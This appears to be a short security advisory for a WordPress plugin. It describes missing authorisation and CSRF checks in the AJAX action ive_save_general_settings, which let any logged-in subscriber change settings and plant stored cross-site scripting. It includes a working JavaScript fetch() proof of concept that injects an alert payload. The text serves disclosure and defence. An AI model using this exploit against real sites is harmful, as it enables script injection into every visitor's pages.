The plugin does not have authorisation and CSRF checks in the ive_save_general_settings AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin’s settings which could lead to Stored Cross-Site Scripting issue. Note: v1.1.4.7 added CSRF check, authorisation was added in 1.1.4.9
fetch("http://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=ive_save_general_settings&ive_custom_js=alert(/XSS/)",
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
The XSS will be triggered in all frontend pages in the Pro version